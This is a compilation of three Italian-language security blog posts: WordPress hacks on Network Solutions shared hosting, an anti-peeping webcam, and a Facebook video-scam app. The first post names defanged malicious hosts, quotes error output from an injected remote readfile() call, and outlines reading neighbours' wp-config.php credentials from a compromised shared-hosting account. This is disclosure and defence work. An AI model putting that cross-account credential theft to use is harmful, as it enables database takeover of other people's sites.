Alcuni dei blog violati contengono centinaia di link spam, visibili solamente se si naviga disattivando JavaScript. Per qualche motivo, ogni link è racchiuso tra tag <noindex> e usa rel=”nofollow”nei parametri dei tag. Quindi qual è il suo uso, se non vien utilizzato da chi naviga sul web, né dai motori di ricerca?

I link sono seguiti da iframe nascosti di networkads.

alkoltashov.narod.ru

Ho trovato inoltre una dozzina di blog Wordpress infetti che traggono gli hidden link da hxxp://alkoltashov.narod.ru/ sites.txt. I link dovrebbero mostrare <div> esternamente rispetto all’area visibile, ma a causa della configurazione dei server di Network Solutions, che non permette l’accesso ai file tramite url, questa injection fallisce restituendo l’errore seguente (anch’esso mostrato oltre l’area visibile ):

<div style="left: -2322px; position: absolute; top: -3433px">
Warning: readfile() : URL file-access is disabled in the server configuration in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
Warning: readfile(hxxp://alkoltashov .narod .ru/ sites.txt) : failed to open stream: no suitable wrapper could be found in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
</div>

Secondo la cache di Google, questa injection di link in remoto è avvenuta a gennaio.

Ed è limitata ai blog sui server di Network Solutions.

WebEasySearch. com

Alcuni dei blog violati, inoltre, reindirizzano i risultati dei motori di ricerca verso il sito webeasysearch .com.

Questo avviene solamente se non avete già visitato il blog violato (probabilmente vengono verificati i cookie di WP).

Questa violazione cifra la stringa della query del motore di ricerca e la passa a webeasysearch ( webeasysearch .com ), che la decifra e visualizza i propri risultati per la stessa query.

Scommetto che sia effettuato da qualche codice PHP iniettato nel file di WordPress.

Lo stile della violazione e la gamma dei siti colpiti, mi fanno pensare che tutte queste violazioni siano state realizzate dallo stesso hacker.

Conclusione

1. Gli hacker, decisamente, hanno come obiettivo i blog WordPress, ma dubito che sia stata sfruttata una qualsiasi vulnerabilità di WordPress. Altrimenti avremmo assistito ad altre violazioni simili non solo sui server di Network Solutions.

2. Allo stesso tempo però, sono interessati più di una dozzina di server di Network Solutions. Potrebbe esserci una falla di sicurezza (o una minima vulnerabilità ) sulla loro rete. Dovrebbero esaminare seriamente il problema.

3. Sono d’accordo con David di Sucuri Security, che pensa che tutto ciò possa essere eseguito tramite l’accesso ad un unico account compromesso (o anche creato legalmente da alcuni hacker). Gli hacker possono utilizzare questo account per eseguire script che leggono il contenuto dei file di wp-config.php su account neighbor (secondo una ricerca con reverse IP ci sono diverse migliaia di siti sul server con IP 205.178.145.65).

È abbastanza facile ( non svelerò i trucchi del perfetto hacker ma funzionano bene sui server di Network Solutions ) identificare i siti con blog Wordpress su qualsiasi server e di conseguenza identificare i percorsi assoluti del file wp-config.php, che contengono i dati d’accesso al database e i nomi delle tabelle di WordPress, il tutto in chiaro. Gli hacker, successivamente, hanno semplicemente bisogno di eseguire un altro script che inietti quello che vogliono nei database dei loro neighbour server.

Allo stesso modo qualsiasi codice dannoso può essere iniettato in tutti i file scrivibili nell’account neighbor.

Vulnerabilità progettuale di WordPress

Sui server condivisi è possibile proteggere i propri file da neighbor dannosi, rendendoli di sola lettura. Solitamente i permessi sui file a 644 e sulle directory a 755 sono sufficienti.

Tuttavia se i neighbor, in qualche modo, riescono ad ottenere l’accesso, possono fare ciò che vogliono con il vostro database. Nel caso di WordPress, è sufficiente leggere il file wp-config.php nella root del blog WordPress.

Per nascondere il contenuto del file wp-config.php dai server neighbor, David (Sucury Security) consiglia che questo file debba avere 750 ( credo volesse dire 640 , in quanto il permesso di esecuzione non è necessario ). Purtroppo, questo funziona solo sui server con suPHP. Su altri server dove il server web esegue gli script PHP con propri diritti, questo stratagemma rischia di danneggiare completamente i blog WordPress. Ogni pagina restituirà l’errore Failed opening required ‘wp-config.php’” .

Questo significa che i blog di WordPress sono vulnerabili a questo tipo di attacco sulla maggior parte dei server condivisi . Basta violare un account (la maggior parte dei server condivisi hanno più account violati), o addirittura creare un account appositamente per l’hacking e sarà possibile guadagnare l’accesso al database MySQL dei vostri neighbor che abbiano un blog con WordPress. Qualsiasi altro web script che dipenda da un database e che memorizzi i dati d’accesso in chiaro, è anch’esso vulnerabile.

I ragazzi di WordPress sono consapevoli di questo problema sui server condivisi ma, per qualche motivo, danno anche questo strano consiglio sui permessi a 750 per wp-config.php, che è sbagliato (750 invece di 640) e funziona soltanto sui server suPHP :

Se siete su un server condiviso i permessi della directory wp-config.php dovrebbero essere a 750. Questo significa che nessun altro utente sarà in grado di leggere il nome utente e la password del vostro database. Se si dispone di FTP o accesso alla shell, procedere come segue:

chmod 750 wp-config.php

Quindi non c’è un modo universale per proteggere i dati d’accesso al database sui server condivisi. Vedo sempre più attacchi caratterizzati da un account compromesso su un server condiviso e successivamente utilizzato per violare altri siti sullo stesso server. È il momento di rivedere l’approccio utilizzato verso il file wp-config.php .

Dite la vostra

Cosa pensate del problema dei file wp-config.php universalmente leggibili sui server condivisi? Qualche idea su come risolverlo?

Se siete un cliente di Network Solutions ed il vostro sito è stato violato, mi piacerebbe sapere anche le vostre esperienze.
Potreste raccontarci quali permessi sui file utilizzate (soprattutto se siete stati vittime degli attacchi di alkoltashov .narod .ru and WebEasySearch ) ?

Altri commenti sono i benvenuti.

Post correlati:

• Spammy Links From Remote Servers
• Rogue blogs redirect search traffic to bogus AV sites. Part 2 .
• From Hidden Iframes to Obfuscated Scripts
• Evict Hackers
• Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects

Fonte: Network Solutions and WordPress Security Flaw

Ho già parlato del problema dei pervertiti e dei cyberstalker che usano il malware per controllare le webcam delle proprie vittime e spiare segretamente le persone nelle proprie camere da letto.

In più occasioni gli hacker hanno sfruttato la tecnologia per ricattare giovani donne che posavano nude, minacciando d’inviare altre foto compromettenti ai loro amici online.

La maggior parte del software dannoso è progettato per rubare l’identità dell’utente, le password, i dati bancari; ma è altrettanto facile programmare un cavallo di Troia/spyware che prenda il controllo della webcam.

Ecco perché ero interessato a vedere questa nuova webcam usb di Gsou.

La maggior parte delle webcam visualizza una luce quando è accesa. Questa invece, dalle sembianze di un simpatico robot umanoide, alza le braccia per coprire il suo “occhio” quando è spenta! Sarebbe piuttosto difficile non accorgersi che un hacker, da remoto, ha attivato la webcam se le sue braccia improvvisamente si sono abbassate.

Secondo i costruttori cinesi, i movimenti automatici verso il basso o l’alto per segnalare l’attivazione o disattivazione della webcam, possono anche essere eseguiti manualmente.

Tutto questo non solo è molto carino ma posso immaginare che possa anche offrire un livello supplementare di privacy nella vita privata delle persone su Internet.

Naturalmente assicurarsi che la webcam non possa spiare, è solo un modo per difendersi. Si dovrebbe anche mantenere il computer protetto dalle minacce più recenti con software anti-malware, patch di sicurezza e firewall. E se non ci si può permettere un simpatico robot che automaticamente copre il suo obiettivo quando si desidera privacy, magari un cerotto sulla webcam potrebbe svolgere lo stesso lavoro altrettanto bene?

Hmm .. considerando le news recenti , dove il malware potrebbe essere integrato all’interno della tecnologia cinese, mi chiedo se l’India acquisterà una di queste webcam?

Chapeau a Wing Fei Chia per averlo segnalato per primo

Fonte: Anti-peeping webcam protects your privacy

Sulla bacheca di un vostro amico su Facebook, potreste aver notato un video dal titolo “ Optical Illusion! [HQ] “ .
In realtà non è un video ma un link a un’applicazione. Se proseguite, vi verrà chiesto di scaricare un file chiamato flvdirect.exe che potrebbe contenere virus o malware.

Aggiornamento: Questo scam è stata rimosso da Facebook. L’applicazione non esiste più. In futuro se troverete altre applicazioni simili, non diventate vittime inconsapevoli. Se avete trovato qualche altro scam, potete segnalarlo.

Ecco l’aspetto del post:

Ecco come funziona questo virus:

1) Dopo aver fatto clic sul link vi verrà chiesto di autorizzare l’applicazione FB HD Video Player – hxxx://apps.facebook.com/hghh_rtrt/ -

2) Verrà quindi visualizzato il messaggio Grazie per l’autorizzazione! Potete continuare con il video ora.

3) Dopo aver fatto clic su continua, verrete rediretti alla pagina in cui dovrebbe esserci il video. Il video non si aprirà e verrà visualizzato il messaggio “Il tuo lettore FLV sembra non essere aggiornato. Aggiorna il tuo lettore FLV per continuare. Fate clic sul pulsante “Continua” e attendete qualche secondo. ”

4) Poi vi verrà chiesto di scaricare il file “ FLVDirect.exe “.

Immediatamente verrà inviato un messaggio sulla bacheca dei vostri amici che mostrerà il link e il messaggio “[vostro nome], questo è senza dubbio il video più bollente che ci sia! ”

Non cliccate sul link e se doveste trovarlo sulla bacheca di un vostro amico, ignoratelo. Se avete già cliccato rimuovete l’applicazione andando su:

Account – Impostazioni applicazioni

Troverete “ F.B. HD Video Player ” fate clic sulla croce sulla destra per eliminarlo.

Se avete scaricato e installato il programma “Flvdirect.exe” analizzate il computer con un antivirus e un malware scanner.

Facebook certamente rimuoverà l’applicazione in pochi giorni. Tuttavia i vostri amici potrebbero abboccare. Avvisateli.

Fonte: Optical Illusion! [HQ] ” – Facebook video link which may contain virus